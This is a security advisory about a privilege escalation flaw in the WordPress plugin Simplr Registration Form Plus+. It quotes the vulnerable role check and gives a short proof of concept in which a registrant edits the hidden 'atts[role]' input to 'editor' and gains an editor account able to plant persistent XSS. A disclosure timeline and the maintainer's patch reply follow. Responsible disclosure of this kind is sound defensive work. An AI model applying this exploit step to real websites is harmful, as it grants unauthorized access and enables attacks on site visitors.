Privilege Escalation Vulnerability in Simplr Registration Form Plus+
We recently had a request for a file from the plugin Simplr Registration Form Plus+, /wp-content/plugins/simplr-registration-form/assets/simplr_reg.js, on one of our websites. A request for a file from plugin that isn’t installed on a website is usually an indication that someone is probing for usage of a plugin to try to exploit a vulnerability in it. After seeing the request we went looking for what the hacker might be looking to exploit in the plugin so that we could make sure it was in our data set. Since the plugin handles registering users a security issue with it is a big concern. We didn’t have any vulnerabilities for the plugin already in our data set, we couldn’t find any public reports of vulnerabilities, and the plugin hasn’t been updated in five months so a vulnerability wasn’t recently fixed in it. At that point we started to review the plugin for a security vulnerability that hackers might be interested in exploiting.
After looking for some common items that we have been seeing as causing many security issues and not finding any of those issues in this plugin, we moved on to the user registration capability since a problem with that is something that a hacker would be interested in exploiting.
We first noticed that it was possible for Author level users to create a registration where the role of the new user is an Editor, which is higher level user. So right there you have a privilege escalation vulnerability, though not something that would seem to be interest to hackers as their ability to gain access to an Author level account would be limited.
While looking into that issue we realized that there much larger related issue. When some is registering an account through the plugin they can control what role there account will have through the POST input “atts[role]”.
The only limit that plugin imposes is that you can set the role to that of an Administrator:
125 126 127 128 129 | $role = @$atts['role']; if('' == $role) { $role = 'subscriber'; } if('administrator' == $role) { wp_die('Do not use this form to register administrators'); } if ( version_compare($wp_version, "3.1", "<" ) ) { require_once(ABSPATH . WPINC . '/registration.php' ); |
You can set it to the Editor role, which gives you access to the unfiltered_html capability so you use the access possible for persistent cross-site scripting (XSS).
Proof of Concept
Add a user registration form to a post or page using the shortcode “[register role=”contributor” password=”yes” fields=””]”. While on the page with the newly added user registration form use the developer tools of your web browser to edit the line
<input type=”hidden” name=”atts[role]” value=”contributor” />
to
<input type=”hidden” name=”atts[role]” value=”editor” />
Fill out the required form fields and thenregister the account. You will now have an editor level account on the website.
Timeline
- 6/18/2016 – Developer notified.
- 6/21/2016 – WordPress.org Plugin Directory notified.
- 6/28/2016 – Removed from Plugin Directory.
Hey, I’m the maintainer of this plugin and I wanted to let you know that I have submitted a patch for this to the WordPress repo which should become available shortly. Thanks so much for posting!
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=1447882%40simplr-registration-form&old=1341363%40simplr-registration-form&sfp_email=&sfph_mail=
In our case allowed spammers to skip captcha